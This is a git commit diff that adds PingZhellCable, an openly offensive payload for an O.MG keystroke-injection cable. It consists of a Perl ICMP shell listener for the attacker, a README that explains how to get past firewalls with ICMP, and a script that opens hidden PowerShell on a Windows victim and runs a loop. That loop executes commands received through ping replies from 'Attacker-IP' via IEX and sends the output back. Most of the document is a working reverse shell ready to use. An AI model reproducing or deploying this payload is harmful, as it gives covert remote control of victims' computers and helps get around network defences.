mirror of https://github.com/hak5/omg-payloads.git
0iphor13
GitHub
parent
2c7e3869be
commit
282f703a81
|
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env perl
|
||||
#
|
||||
# icmpsh - simple icmp command shell
|
||||
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
|
||||
# This program is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
#
|
||||
# Modified by 0iphor13 for PingZhellCable
|
||||
#
|
||||
#
|
||||
#
|
||||
#
|
||||
|
||||
|
||||
use strict;
|
||||
use IO::Socket;
|
||||
use NetPacket::IP;
|
||||
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
|
||||
use Net::RawIP;
|
||||
use Fcntl;
|
||||
|
||||
print "Loading PingZhellCable...\n";
|
||||
|
||||
# create raw socket
|
||||
my $sock = IO::Socket::INET->new(
|
||||
Proto => "ICMP",
|
||||
Type => SOCK_RAW,
|
||||
Blocking => 1) or die "$!";
|
||||
|
||||
# set stdin to non-blocking
|
||||
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
|
||||
|
||||
|
||||
#Unnecessary print output - just for fun
|
||||
sleep(2);
|
||||
print ". .\n";
|
||||
sleep(1);
|
||||
print ". . .";
|
||||
sleep(1);
|
||||
print ". . . .";
|
||||
sleep(2);
|
||||
print "PingZhellCable client ready!\n";
|
||||
my $input = '';
|
||||
while(1) {
|
||||
if ($sock->recv(my $buffer, 4096, 0)) {
|
||||
my $ip = NetPacket::IP->decode($buffer);
|
||||
my $icmp = NetPacket::ICMP->decode($ip->{data});
|
||||
if ($icmp->{type} == ICMP_ECHO) {
|
||||
# get identifier and sequencenumber
|
||||
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
|
||||
|
||||
# write data to stdout and read from stdin
|
||||
print $data;
|
||||
$input = <STDIN>;
|
||||
|
||||
# compile and send response
|
||||
$icmp->{type} = ICMP_ECHOREPLY;
|
||||
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
|
||||
my $raw = $icmp->encode();
|
||||
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
|
||||
$sock->send($raw, 0, $addr) or die "$!\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
**Title: PingZhellCable**
|
||||
|
||||
Author: 0iphor13
|
||||
OS: Windows<br>
|
||||
Version: 1.0<br>
|
||||
Requirements: OMG Firmware v.2.5 or higher</p>
|
||||
|
||||
**What is PingZhellCable?**
|
||||
#
|
||||
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
|
||||
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
|
||||
*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
|
||||
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
|
||||
*The client ICMP agent (PingZhellClient.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
|
||||
*The server ICMP Agent (PingZhellClient.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellCable input) and sends it commands to execute.*
|
||||
#
|
||||
There you go, a reverse shell without the usage of ports.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
Upload PingZhellClient.pl onto your attacking machine.
|
||||
Install dependencies, if needed:
|
||||
- IO::Socket
|
||||
- NetPacket::IP
|
||||
- NetPacket::ICMP
|
||||
|
||||
Disable ICMP replies by the OS:
|
||||
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
|
||||
|
||||
Start the client -> `perl PingZhellClient.pl`
|
||||
|
||||
#
|
||||
<p>!!!Insert the IP of your attacking machine into the payload variable $IP!!!<br>
|
||||
#
|
||||
<p>Plug in your OMG device.<br>
|
||||
Achieve reverse shell.<br>
|
||||
run away <3</p>
|
||||
|
||||
|
||||
Credit for code and ideas:
|
||||
- bdamele
|
||||
- Nikhil Mittal
|
||||
- krabelize
|
||||
|
|
@ -0,0 +1,24 @@
|
|||
REM PingZhellCable
|
||||
REM Version 1.1
|
||||
REM OS: Windows
|
||||
REM Author: 0iphor13
|
||||
REM Requirements: OMG Firmware v.2.5 or higher
|
||||
|
||||
REM Getting remote access via ICMP
|
||||
|
||||
DELAY 500
|
||||
DUCKY_LANG de
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -NoP -NonI -w hidden
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $IP = 'Attacker-IP';
|
||||
DELAY 250
|
||||
STRING $Delay=5;$BufferSize=128;$ICMPCable=New-Object System.Net.NetworkInformation.Ping;$PingOMG=New-Object System.Net.NetworkInformation.PingOptions;$PingOMG.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('O.MG@PS '+(gl).Path+'> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;
|
||||
DELAY 250
|
||||
STRING if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null;$i +=1;};$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPCable.Send($IP,60 * 10000, $NGGYU2, $PingOMG) | Out-Null}}else{$ICMPCable.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');$ICMPCable.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingOMG) | Out-Null}else{Start-Sleep -Seconds $Delay}}
|
||||
DELAY 250
|
||||
ENTER
|
||||
Binary file not shown.
|
After Width: | Height: | Size: 34 KiB |
Loading…
Reference in New Issue